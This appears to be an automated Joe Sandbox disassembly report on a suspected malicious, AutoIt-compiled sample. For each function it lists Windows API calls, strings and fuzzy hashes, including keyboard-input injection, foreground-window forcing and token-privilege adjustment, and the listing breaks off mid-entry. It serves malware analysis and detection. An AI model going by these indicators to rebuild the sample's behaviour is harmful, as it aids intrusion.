Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: daaa19b126eb6512fc130fc74772887fca1177129fb330c934b1519df278f5c5
Instruction ID: 70be65da0cc10dd4c376051da6d67ff154b781fea28401a3756c15fd523f39b1
Opcode Fuzzy Hash: daaa19b126eb6512fc130fc74772887fca1177129fb330c934b1519df278f5c5
Instruction Fuzzy Hash: 0F4107746043519FDB14DF14C454B5ABBE1BF85318F1988ACE89A8B362C732E885CF92

Function 00A17B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A17BB3

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 3ef6bb34b00f3f85c5e585641f6368aca3b09d2b42cc1f4da3e56d653cbbf770
Instruction ID: b6126c2ca62a5ec3fd6e9d21fe200b734067a01040fdde6cf79464a10977c5db
Opcode Fuzzy Hash: 3ef6bb34b00f3f85c5e585641f6368aca3b09d2b42cc1f4da3e56d653cbbf770
Instruction Fuzzy Hash: 82213672A08A08EBDB14CF66EC81BAE7BB4FB54351F21846DF486C5090EB3090D0C781

Function 00A208DC Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A13C14,00AD52F8,?,?,?), ref: 00A2096E

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

_wcscat.LIBCMT ref: 00A54CB7

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID:
API String ID: 257928180-0
Opcode ID: 4b8c468021d85409baa9ed637f3f6538724e907cb6f2d1d95801eff5722edc40
Instruction ID: ee6fbb640968a8af96fe937b0fb85475a04e9c7d94ac5ad339913ac0988cd6c8
Opcode Fuzzy Hash: 4b8c468021d85409baa9ed637f3f6538724e907cb6f2d1d95801eff5722edc40
Instruction Fuzzy Hash: CF21C43190A6959FCB02DB78D896AD9BFB4BF1B34070845EAE885CF203D630568A8751

Function 00A1784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A17899

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 3c0151191e2ae7bd45d5ce8a5e0f6df84c9cb98e964aceacff5b63da83f16921
Instruction ID: 9b2356cc95616966614201f93cc3f5f90b8e9290b95fd71a8ce9c42b8b7fd26f
Opcode Fuzzy Hash: 3c0151191e2ae7bd45d5ce8a5e0f6df84c9cb98e964aceacff5b63da83f16921
Instruction Fuzzy Hash: 1911B131608215AFD715DF28D985CAEB7B9EF85324724812AF919CB391DB32EC91CB90

Function 00A14DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A14BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00A14BEF

Part of subcall function 00A3525B: __wfsopen.LIBCMT ref: 00A35266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14E0F

Part of subcall function 00A14B6A: FreeLibrary.KERNEL32(00000000), ref: 00A14BA4

Part of subcall function 00A14C70: _memmove.LIBCMT ref: 00A14CBA

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 23cde09014090edc2430f3bab86b7b4985df16515e9484a354efbad0331e130d
Instruction ID: e191f3259315ce6efbccf67d632e33e181598a1fb11c8b5fdd427325c2e86fdc
Opcode Fuzzy Hash: 23cde09014090edc2430f3bab86b7b4985df16515e9484a354efbad0331e130d
Instruction Fuzzy Hash: F011E331604205ABCF10FFB8CE12FEE77A9AF88710F108829F541E71C1DA719A419B50

Function 00A4FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00A4FD91

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: f95fec01ea8b00484fec0c071b4fc0a01dc5c8f7195b385d87aa7500a80900fa
Instruction ID: 4a2ea3f861b0ae2ded9525df986a72ef49ffe6231433a6bec71fdde3b3a9a6db
Opcode Fuzzy Hash: f95fec01ea8b00484fec0c071b4fc0a01dc5c8f7195b385d87aa7500a80900fa
Instruction Fuzzy Hash: 86210FB4A08311DFCB14DF64D454B5ABBE1BF88314F058968F88A97722D731E849CB92

Function 00A18248 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,00000000,00000048,-00000003,?,00A23E69,?,?,?,-00000003,00000000,00000000), ref: 00A18280

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 6f6afd1d1f05e002690a08a28bfd421ef8021ea69bb509800b54b99702b9d7fd
Instruction ID: 6cc1f9ebaeefaffb930fd5f4da6c44c237ce2d05a2ef78a258e64fdf4cd19b7f
Opcode Fuzzy Hash: 6f6afd1d1f05e002690a08a28bfd421ef8021ea69bb509800b54b99702b9d7fd
Instruction Fuzzy Hash: 3AF0F675600B31DFCB125B55C600AAEFBB5EF44F60F008129F55546650CF39D850CBC4

Function 00A34863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00A348A6

Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 5b19fe4209d1e4f76b1d4d5d78548957e5c742daa5dcc609afbd2850d8b7cae8
Instruction ID: 106505ea5ed3409f268cb91fdb323d8209e8f7b83c67c752c472ab8b7de3cdfc
Opcode Fuzzy Hash: 5b19fe4209d1e4f76b1d4d5d78548957e5c742daa5dcc609afbd2850d8b7cae8
Instruction Fuzzy Hash: 96F0CD31901709EBEF11AFB48D067AE7AA0AF05329F158418F424AB191CBBC9A51DB91

Function 00A14E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14E7E

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: f6202d0b461117279f7909c59aa4a9e5977b23e030f0b09ff3b19253b7bc6ebc
Instruction ID: ddc6c5806c65fa5e283b9caad761d5935bb5a76f944236669187bea884177c0b
Opcode Fuzzy Hash: f6202d0b461117279f7909c59aa4a9e5977b23e030f0b09ff3b19253b7bc6ebc
Instruction Fuzzy Hash: 3FF03975501711CFDB349F68E494892BBF1BF1832A3208A3EE2D686660C7329880DF80

Function 00A30791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A307B0

Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 66be4aa7eb448a12d3c08b36f10f96451469f82dc97f9c147ac1e7554b174a68
Instruction ID: 627ac5c94bacd1a98b4b8670aafd3e324e2cfa181bb6c1429cdf92d1281df90d
Opcode Fuzzy Hash: 66be4aa7eb448a12d3c08b36f10f96451469f82dc97f9c147ac1e7554b174a68
Instruction Fuzzy Hash: 47E0CD36A081285BC720D6989C05FEA77EDDFC87A0F0441B6FC0CD7205DD609CC086D0

Function 00A3525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00A35266

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 1a4e3a9e19969cdbed7e23aec351490e7fc0f416d7a1e965ef4cb63d352f5d88
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 04B092B684020C77CE012A96EC02A8A3B199B41764F408020FB0C18162A673E6649A89

Function 0114B1D0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0114B1E1

Memory Dump Source

Source File: 00000000.00000002.1333407734.0000000001148000.00000040.00000020.00020000.00000000.sdmp, Offset: 01148000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1148000_XeFYBYYj0w.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: b0113e35cbaa463627ab0a27c958d71b1034ab4348889b1ac1db30f5ffa04b16
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: BCE0E67494410EDFDB00EFB4D54969E7FB4EF04701F100161FD01D2281DB309D50DA62

Non-executed Functions

Function 00A9CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A9CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A9CB95
GetWindowLongW.USER32(?,000000F0), ref: 00A9CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A9CC00
SendMessageW.USER32 ref: 00A9CC29
_wcsncpy.LIBCMT ref: 00A9CC95
GetKeyState.USER32(00000011), ref: 00A9CCB6
GetKeyState.USER32(00000009), ref: 00A9CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A9CCD9
GetKeyState.USER32(00000010), ref: 00A9CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A9CD0C
SendMessageW.USER32 ref: 00A9CD33
SendMessageW.USER32(?,00001030,?,00A9B348), ref: 00A9CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A9CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A9CE60
SetCapture.USER32(?), ref: 00A9CE69
ClientToScreen.USER32(?,?), ref: 00A9CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A9CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A9CEF5
ReleaseCapture.USER32 ref: 00A9CF00
GetCursorPos.USER32(?), ref: 00A9CF3A
ScreenToClient.USER32(?,?), ref: 00A9CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A9CFA3
SendMessageW.USER32 ref: 00A9CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A9D00E
SendMessageW.USER32 ref: 00A9D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A9D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A9D06D
GetCursorPos.USER32(?), ref: 00A9D08D
ScreenToClient.USER32(?,?), ref: 00A9D09A
GetParent.USER32(?), ref: 00A9D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A9D123
SendMessageW.USER32 ref: 00A9D154
ClientToScreen.USER32(?,?), ref: 00A9D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A9D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A9D20C
SendMessageW.USER32 ref: 00A9D22F
ClientToScreen.USER32(?,?), ref: 00A9D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A9D2B5

Part of subcall function 00A125DB: GetWindowLongW.USER32(?,000000EB), ref: 00A125EC

GetWindowLongW.USER32(?,000000F0), ref: 00A9D351

Strings

@GUI_DRAGID, xrefs: 00A9CE9C
F, xrefs: 00A9D235

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 1afc19769ff2e22d06f415048cc7cc8b0e4ff6441eba78aaca1d69c0cebd0aa5
Instruction ID: 68947b57397b96de7f21211e651ff29b2ed7d0a611054b65780167265cdc9449
Opcode Fuzzy Hash: 1afc19769ff2e22d06f415048cc7cc8b0e4ff6441eba78aaca1d69c0cebd0aa5
Instruction Fuzzy Hash: E3429C74704781AFDB24CF68C844AAABBE5FF49360F14091AF656CB2B0DB31D891DB52

Function 00A26F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A271C3
_memset.LIBCMT ref: 00A27539
_memmove.LIBCMT ref: 00A276AC

Strings

\b(?=\w), xrefs: 00A63769
[:<:]], xrefs: 00A27479
DEFINE, xrefs: 00A62103
Q\E, xrefs: 00A27FCB
\b(?<=\w), xrefs: 00A63773
[:>:]], xrefs: 00A27492

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 0d7c423997226a133f261d74addcb2fb6806e207caa5754953e64c5214beef08
Instruction ID: 84a9099acb301608fa7f48adc57330b1db133e3e7ecf2e1e870ce10d5b7990d5
Opcode Fuzzy Hash: 0d7c423997226a133f261d74addcb2fb6806e207caa5754953e64c5214beef08
Instruction Fuzzy Hash: D393A075E04219DFDF24CF98D881BADB7B1FF48710F25816AE945AB281E7749E82CB40

Function 00A148D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00A148DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A4D665
IsIconic.USER32(?), ref: 00A4D66E
ShowWindow.USER32(?,00000009), ref: 00A4D67B
SetForegroundWindow.USER32(?), ref: 00A4D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A4D69B
GetCurrentThreadId.KERNEL32 ref: 00A4D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A4D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00A4D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00A4D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00A4D6CF
SetForegroundWindow.USER32(?), ref: 00A4D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D6E7
keybd_event.USER32(00000012,00000000), ref: 00A4D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D6FC
keybd_event.USER32(00000012,00000000), ref: 00A4D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D70A
keybd_event.USER32(00000012,00000000), ref: 00A4D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D719
keybd_event.USER32(00000012,00000000), ref: 00A4D71E
SetForegroundWindow.USER32(?), ref: 00A4D721
AttachThreadInput.USER32(?,?,00000000), ref: 00A4D748

Strings

Shell_TrayWnd, xrefs: 00A4D660

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 36f019163bebf64d7dd92ce948501e0178ebd59c6fbb639e69216d89f6e7bf0a
Instruction ID: 40f9481ed286a8e266049b0eafe259a9de5475df33d068110a7bdff49d217666
Opcode Fuzzy Hash: 36f019163bebf64d7dd92ce948501e0178ebd59c6fbb639e69216d89f6e7bf0a
Instruction Fuzzy Hash: F3315575B403187FEB205BA19C49F7F7E6CEB44B50F114026FA05EA1D1CAB05951AAA1

Function 00A68310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00A687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A6882B
Part of subcall function 00A687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A68858
Part of subcall function 00A687E1: GetLastError.KERNEL32 ref: 00A68865

